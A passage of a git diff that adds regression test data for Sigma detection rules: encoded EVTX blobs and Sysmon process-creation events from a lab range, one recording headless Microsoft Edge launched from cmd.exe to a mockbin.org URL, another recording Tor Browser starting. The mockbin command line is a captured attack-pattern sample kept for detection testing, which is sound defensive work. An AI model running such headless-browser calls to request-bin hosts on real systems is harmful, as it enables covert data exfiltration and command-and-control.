zD`=i{6%F*CbZ?jnAbRns(`|1Uhc3QRZdXTa1lm|@dcuw9d)A`gSZ}Ud(F>z*xEjAP z{I=k{4hKCv?!I#Fk|RSs7qPdtJ~(-y$kOv2&UUJM(&X-IKo@`Op^HOTIL;JZq<1s7 z=%VfflY6%l-3cbQY;-4>+_KS~V00%K-3dl_f+_5+zG9vJm3r+v8?J%Yk8$rKDQ|0v z3F~xV!3rZ*jU(Gw{OdiqhGF!h5>N@K1XKbl0hNGCKqa6O zPzk66R01jim4He>C7=>e38(~A0xAKOfJ#6mpb}6Cs0363Dgl*%NN@K1XKbl b0hNGCKqa6OPzk66R01jim4Hg1Xe97|aEYri literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.json b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.json new file mode 100644 index 000000000..3713caf79 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T23:28:43.862519Z" + } + }, + "EventRecordID": 32995046, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-26 23:28:43.810", + "ProcessGuid": "5AA13A44-AEAB-68FE-435E-000000004002", + "ProcessId": 5784, + "Image": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", + "FileVersion": "141.0.3537.99", + "Description": "Microsoft Edge", + "Product": "Microsoft Edge", + "Company": "Microsoft Corporation", + "OriginalFileName": "msedge.exe", + "CommandLine": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --headless=new --disable-gpu https://mockbin.org/bin/31b1332f-8f5c-490e-8ec0-78e77b4e5709", + "CurrentDirectory": "C:\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=77B843BADE25E2B6FEA4ED02D9DCFDB32759285A,MD5=2CB9DCC4B733F88A7155F0D63AC634B8,SHA256=151A7E879BB4B534AC95D61B982C899CFF3DC01EDC2575FC8D71B3B9B44C8834,IMPHASH=4C2A67DEB457B8BF9F317820EE11E05D", + "ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ParentProcessId": 10048, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/info.yml b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/info.yml new file mode 100644 index 000000000..7ad3f91ab --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/info.yml @@ -0,0 +1,12 @@ +id: 686da1dd-caec-47d8-a254-07ab54f1f3c7 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 1c526788-0abe-4713-862f-b520da5e5316 + title: Chromium Browser Headless Execution To Mockbin Like Site +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + path: regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/27ba3207-dd30-4812-abbf-5d20c57d474e.evtx b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/27ba3207-dd30-4812-abbf-5d20c57d474e.evtx new file mode 100644 index 0000000000000000000000000000000000000000..c40cb656d8c4e584b9eff20c6762bc4781c081b6 GIT binary patch literal 69632 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 literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.json b/regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.json new file mode 100644 index 000000000..c9efaed51 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T23:39:33.565515Z" + } + }, + "EventRecordID": 33232425, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-26 23:39:33.564", + "ProcessGuid": "5AA13A44-B135-68FE-035F-000000004002", + "ProcessId": 10712, + "Image": "C:\\Users\\Administrator\\Desktop\\Tor Browser\\Browser\\firefox.exe", + "FileVersion": "128.14.0", + "Description": "Tor Browser", + "Product": "Tor Browser", + "Company": "Mozilla Corporation", + "OriginalFileName": "firefox.exe", + "CommandLine": "\"C:\\Users\\Administrator\\Desktop\\Tor Browser\\Browser\\firefox.exe\"", + "CurrentDirectory": "C:\\Users\\Administrator\\Desktop\\Tor Browser\\Browser\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "Medium", + "Hashes": 